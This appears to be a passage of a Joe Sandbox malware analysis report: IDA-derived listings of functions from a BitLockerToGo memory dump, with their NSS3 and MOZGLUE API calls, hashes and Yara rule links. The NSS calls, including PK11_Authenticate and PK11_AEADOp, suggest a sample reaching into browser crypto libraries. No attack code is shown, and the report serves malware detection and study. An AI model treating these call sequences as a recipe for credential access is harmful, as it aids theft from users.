                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000,6C6D5F34,00000A20,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6E49F9
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000,?,?,6C6D5F34,00000A20,?,?,?,?,?,?,?,?,?,6C6DAAD4), ref: 6C6E4A06
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,6C6D5F34,00000A20), ref: 6C6E4A16
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,6C6D5F34,00000A20), ref: 6C6E4A1C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Item_UtilZfreefree
                                                                                                                                                                                                                                                                                                                                                          • String ID: 4_ml
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2193358613-1773825060
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5770f893668c58deb4bacdb4d0db17aebb52c38535f3035e621efe4ff5380b6b
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 332d4fe4b29b8f52c59acfb22dfc12db7cd6ed4d80d3525a1758fe85f7dde3ca
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5770f893668c58deb4bacdb4d0db17aebb52c38535f3035e621efe4ff5380b6b
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC015EB69011049FCB00CF69DCC4C967BBCEF8A25934584A6E909DB705E731E908CBA9
                                                                                                                                                                                                                                                                                                                                                          Function 6C75C9B0 Relevance: 10.5, APIs: 7, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000000,6C6D1AB6,00000000,?,?,6C6D07B9,?), ref: 6C75C9C6
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C6D07B9,?), ref: 6C75C9D3
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000000,00000001), ref: 6C75C9E5
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75C9EC
                                                                                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(00000080), ref: 6C75C9F8
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C75C9FF
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C75CA0B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 682657753-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 53821076f2c8c9909c69c5118f482dec25d58818e9201adecdf1e31cf6ac7be2
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f1bf1395930d2bf5f0bc5fcec394d86ca42be55e4a8be3e8398855473909ff78
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 53821076f2c8c9909c69c5118f482dec25d58818e9201adecdf1e31cf6ac7be2
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9012CB2600605ABDF00EFB4CC48857B7B8FB4A2627040539E906C3600D735F456CBE1
                                                                                                                                                                                                                                                                                                                                                          Function 6C6E2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6E3046
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6CEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6CEE85
                                                                                                                                                                                                                                                                                                                                                          • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C6B7FFB), ref: 6C6E312A
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6E3154
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C6E2E8B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6CF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C6B9BFF,?,00000000,00000000), ref: 6C6CF134
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(8B3C75C0,?,6C6B7FFA), ref: 6C6E2EA4
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6E317B
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2334702667-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f48cee165710c75d3202fae1cf0f341e698c47b67168cecd6819d3976ae12d34
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f2d1f6942df020784f84320f38240f58c3e919b5c706991ca95d9e030ae020e5
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f48cee165710c75d3202fae1cf0f341e698c47b67168cecd6819d3976ae12d34
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75A1D071A042199FDB24CF54CC84BEAB7B5EF49308F04809AED4967781E731AD45CF96
                                                                                                                                                                                                                                                                                                                                                          Function 6C69A970 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9a6c8126059b6b4d6d5666ca3486e6834be76e1af5de90f98be0e49957f5244d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b5f0db4dffe1955c78d1e2333f36a6da34eef4b9648e49ea4bebbb61da1ffb3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a6c8126059b6b4d6d5666ca3486e6834be76e1af5de90f98be0e49957f5244d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A913E31D0416A4FCB25CE1888913DEB7F6AF4A31CF1581E9C59A9BA03D6318D86CFD9
                                                                                                                                                                                                                                                                                                                                                          Function 6C6AED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C6AED6B
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C6AEDCE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: malloc.MOZGLUE(6C698D2D,?,00000000,?), ref: 6C6A0BF8
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A0BE0: TlsGetValue.KERNEL32(6C698D2D,?,00000000,?), ref: 6C6A0C15
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,6C6AB04F), ref: 6C6AEE46
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C6AEECA
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C6AEEEA
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C6AEEFB
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3768380896-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6e0c9554835efc570f3568e5e457c13af8e17d4ded35043990bc1b380158acc5
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1d1d5aee2ead48616cfd6dd2b3ff47a05866d297dbc7188ceb97a6eea3599f10
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e0c9554835efc570f3568e5e457c13af8e17d4ded35043990bc1b380158acc5
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0816CB5A002059FEB14CF99D884BAB77F5FF89308F144428E8159B751DB31EC26CBA9
                                                                                                                                                                                                                                                                                                                                                          Function 6C6ACCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6AC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C6ADAE2,?), ref: 6C6AC6C2
                                                                                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C6ACD35
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DC6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C750A27), ref: 6C709DD1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C709DED
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C696C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C641C6F,00000000,00000004,?,?), ref: 6C696C3F
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C6ACD54
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C697260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C641CCC,00000000,00000000,?,?), ref: 6C69729F
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C6ACD9B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C6ACE0B
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C6ACE2C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A10F3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: EnterCriticalSection.KERNEL32(?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A110C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PL_ArenaAllocate.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1141
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: PR_Unlock.NSS3(?,?,?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A1182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A10C0: TlsGetValue.KERNEL32(?,6C648802,00000000,00000008,?,6C63EF74,00000000), ref: 6C6A119C
                                                                                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C6ACE40
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: TlsGetValue.KERNEL32 ref: 6C6A14E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: EnterCriticalSection.KERNEL32 ref: 6C6A14F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6A14C0: PR_Unlock.NSS3 ref: 6C6A150D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: PORT_ArenaMark_Util.NSS3(?,6C6ACD93,?), ref: 6C6ACEEE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C6ACD93,?), ref: 6C6ACEFC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C6ACD93,?), ref: 6C6ACF0B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C6ACD93,?), ref: 6C6ACF1D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF47
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF67
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6ACEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C6ACD93,?,?,?,?,?,?,?,?,?,?,?,6C6ACD93,?), ref: 6C6ACF78
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3748922049-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 665271630c6100fa2487a392a597597ba21166546de9b7c64832e26af2d5bf94
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 906d190ae766c296882cfab32528b35f875714ea0afd8c538f5325359edeb6e3
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 665271630c6100fa2487a392a597597ba21166546de9b7c64832e26af2d5bf94
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A351B3B6A00205AFEB10EFA9DC40B9A77E4FF49348F250524D94697741EB32ED07CB99
                                                                                                                                                                                                                                                                                                                                                          Function 6C67EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C67EF38
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C669520: PK11_IsLoggedIn.NSS3(00000000,?,6C69379E,?,00000001,?), ref: 6C669542
                                                                                                                                                                                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C67EF53
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: TlsGetValue.KERNEL32 ref: 6C684C4C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: EnterCriticalSection.KERNEL32(?), ref: 6C684C60
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684CA1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C684CBE
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C684CD2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C684C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C684D3A
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C67EF9E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BF0: TlsGetValue.KERNEL32(?,?,?,6C750A75), ref: 6C709C07
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C67EFC3
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C67F016
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C67F022
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2459274275-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e431cfbcaed8091f68a686f6f42af7974051d330ce1ea54daa6fac0e823e6a38
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 69976962c9e159f1e4e46562537a54836c3fa6be2fbeab00fefeb74913b99b5c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e431cfbcaed8091f68a686f6f42af7974051d330ce1ea54daa6fac0e823e6a38
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA41A2B1E00109AFDF018FA9DC54BEE7BB9AF49358F004029F914A7750E772C9158BB9
                                                                                                                                                                                                                                                                                                                                                          Function 6C654860 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C654894
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6548CA
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6548DD
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C6548FF
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C654912
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C65494A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
